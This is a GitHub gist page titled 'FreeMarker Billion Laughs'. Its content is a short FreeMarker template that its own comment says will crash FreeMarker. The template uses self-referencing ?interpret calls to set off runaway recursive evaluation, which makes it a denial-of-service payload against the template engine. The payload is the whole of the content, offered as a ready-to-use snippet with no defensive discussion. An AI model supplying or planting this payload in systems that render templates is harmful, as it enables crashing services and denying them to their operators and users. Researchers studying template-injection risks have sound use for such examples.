Skip to content

Instantly share code, notes, and snippets.

@Plazmaz
Last active November 20, 2019 20:37
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Plazmaz/6a3adaac8b1bd83ad756b77e3c620676 to your computer and use it in GitHub Desktop.
Save Plazmaz/6a3adaac8b1bd83ad756b77e3c620676 to your computer and use it in GitHub Desktop.
FreeMarker Billion Laughs
<#-- This will crash Freemarker when used as a template -->
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/>
<#list x as y>
<#assign x2=y?interpret/>
<@x2/>
</#list>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment